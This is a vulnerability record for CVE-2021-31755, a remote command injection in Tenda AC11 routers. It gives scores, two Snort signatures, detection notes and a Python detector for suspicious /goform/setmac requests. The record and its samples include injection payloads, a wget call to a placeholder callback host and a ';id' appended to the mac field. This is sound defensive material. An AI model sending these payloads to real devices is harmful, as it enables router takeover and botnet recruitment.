CVE-2021-31755
published 2021-05-07


Priority: P197 · critical · 9.8 (CVSS 3.1)
CVSS 3.1 vector: AV:N / AC:L / PR:N / UI:N / S:U / C:H / I:H / A:H
Tags: KEV · ITW · EXPLOIT
CISA Known Exploited Vulnerability, remediation due 2021-11-17
Exploited in the wild
EPSS: 85.85% (99.7th percentile)
An issue was discovered on Tenda AC11 devices with firmware through 02.03.01.104_CN. A stack buffer overflow vulnerability in /goform/setmac allows attackers to execute arbitrary code on the system via a crafted post request.

Affected (1 range)

Vendor    Product          Version range         Fixed in
tenda     ac11_firmware    <= 02.03.01.104_cn    (not listed)

Detection & IOCs (extracted from sources)

path: /goform/setmac
command: mac=wget+http://{{interactsh-url}}
snort (ET, sid:2033284, inbound):
alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Trenda Router AC11 RCE Inbound (CVE-2021-31755)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/goform/setmac"; fast_pattern; http.request_body; content:"&mac="; reference:url,www.fortinet.com/blog/threat-research/the-ghosts-of-mirai; reference:url,github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2021/CVE-2021-31755.yaml; reference:cve,2021-31755; classtype:attempted-admin; sid:2033284; rev:5; metadata:attack_target Networking_Equipment, tls_state plaintext, created_at 2021_07_08, cve CVE_2021_31755, deployment Perimeter, deployment Internal, performance_impact Low, confidence High, signature_severity Major, tag Exploit, tag CISA_KEV, updated_at 2024_10_21, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application; target:dest_ip;)
snort (ET, sid:2033285, outbound):
alert http [$HOME_NET,$HTTP_SERVERS] any -> any any (msg:"ET EXPLOIT Trenda Router AC11 RCE Outbound (CVE-2021-31755)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/goform/setmac"; fast_pattern; http.request_body; content:"&mac="; content:"|3b|"; within:40; reference:url,www.fortinet.com/blog/threat-research/the-ghosts-of-mirai; reference:cve,2021-31755; classtype:attempted-admin; sid:2033285; rev:2; metadata:created_at 2021_07_08, cve CVE_2021_31755, confidence High, signature_severity Major, tag CISA_KEV, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2024_03_08;)
  • Exploit targets HTTP POST to /goform/setmac with a crafted `mac=` parameter containing shell metacharacters (e.g., semicolon 0x3b) or OS commands such as wget; inspect the request body for `&mac=` followed by non-MAC-address content within 40 bytes.
  • Inbound exploitation attempts arrive as unauthenticated POST requests to /goform/setmac; no prior authentication is required, so any such POST from an external source should be treated as suspicious.
  • Outbound callback (OOB/OAST) via wget to an attacker-controlled host is a reliable indicator of successful exploitation; monitor for unexpected outbound HTTP from router management IPs.
  • Nuclei template uses interactsh OOB interaction confirmation (HTTP protocol response) as the positive match condition for exploitation.
  • Associated with Mirai botnet campaigns; detections should be correlated with known Mirai IoT exploitation activity.
  • Vulnerable firmware version is 02.03.01.104_CN and below; detections should be scoped to Tenda AC11 devices running this firmware range.
  • The ET Inbound rule (sid:2033284) targets plaintext HTTP only (tls_state plaintext); encrypted management interfaces would not be covered by this signature.
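The following is an added example (not part of this record or of the ET/Nuclei sources) that applies the detection logic of the two ET signatures and the notes above to raw HTTP requests: a POST to /goform/setmac whose body carries `&mac=` is flagged, a `;` within 40 bytes of `&mac=` is flagged as a shell metacharacter (the outbound rule's `|3b|; within:40`), and a `mac` value that is not a well-formed MAC address is flagged separately. The sample requests, the `page=` parameter and the `oast.example` host are constructed placeholders.

```python
"""Added example: flag HTTP POSTs matching the CVE-2021-31755 detection logic."""
from __future__ import annotations

import re
from urllib.parse import unquote_plus

# Constructed sample requests (not captured traffic). The `page=` parameter and
# the oast.example host are placeholders; only `mac=` and the URI come from the record.
SAMPLE_REQUESTS = {
    "benign": (
        "POST /goform/setmac HTTP/1.1\r\nHost: 192.168.0.1\r\n\r\n"
        "page=wan&mac=00:11:22:33:44:55"
    ),
    "oob_callback": (  # same payload shape as the Nuclei template's mac=wget+http://...
        "POST /goform/setmac HTTP/1.1\r\nHost: 192.168.0.1\r\n\r\n"
        "page=wan&mac=wget+http://oast.example/x"
    ),
    "metachar": (
        "POST /goform/setmac HTTP/1.1\r\nHost: 192.168.0.1\r\n\r\n"
        "page=wan&mac=00:11:22:33:44:55;id"
    ),
    "other_uri": (
        "POST /goform/other HTTP/1.1\r\nHost: 192.168.0.1\r\n\r\n"
        "page=wan&mac=00:11:22:33:44:55;id"
    ),
}

MAC_RE = re.compile(r"^[0-9A-Fa-f]{2}([:-][0-9A-Fa-f]{2}){5}$")
MARKER = "&mac="
WINDOW = 40  # distance used by the outbound ET rule: content:"|3b|"; within:40


def parse_request(raw: str) -> tuple[str, str, str]:
    """Split a raw HTTP/1.x request into (method, path, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line = head.split("\r\n", 1)[0]
    method, target, _version = request_line.split(" ", 2)
    path = target.split("?", 1)[0]
    return method, path, body


def inspect_request(raw: str) -> list[str]:
    """Return detection labels for one request; empty list when nothing matches."""
    method, path, body = parse_request(raw)
    if method != "POST" or path != "/goform/setmac":
        return []
    idx = body.find(MARKER)
    if idx == -1:
        return []
    # sid:2033284 semantics: any POST to /goform/setmac carrying &mac= in the body
    labels = ["setmac_post"]
    start = idx + len(MARKER)
    window = body[start:start + WINDOW]
    if ";" in window:  # sid:2033285 semantics: 0x3b within 40 bytes after &mac=
        labels.append("shell_metachar")
    # Refinement from the notes: a mac value that is not a MAC address at all
    value = unquote_plus(body[start:].split("&", 1)[0])
    if not MAC_RE.match(value):
        labels.append("non_mac_value")
    return labels


def triage(requests: dict[str, str]) -> dict[str, list[str]]:
    """Run inspect_request over a batch of named requests."""
    return {name: inspect_request(raw) for name, raw in requests.items()}


if __name__ == "__main__":
    for name, labels in triage(SAMPLE_REQUESTS).items():
        print(f"{name:12s} -> {labels or 'no match'}")
```

As with the inbound ET rule, `setmac_post` fires on a legitimate MAC change too; the `shell_metachar` and `non_mac_value` labels are what separate an exploitation attempt from benign management traffic, and any outbound HTTP from the router following such a request is the confirmation signal the notes describe.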

CVSS provenance

NVD (v3.1):    9.8  CRITICAL  CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
NVD (v2.0):   10.0  CRITICAL  AV:N/AC:L/Au:N/C:C/I:C/A:C
VulnCheck:     9.8  CRITICAL
CISA:          9.8  CRITICAL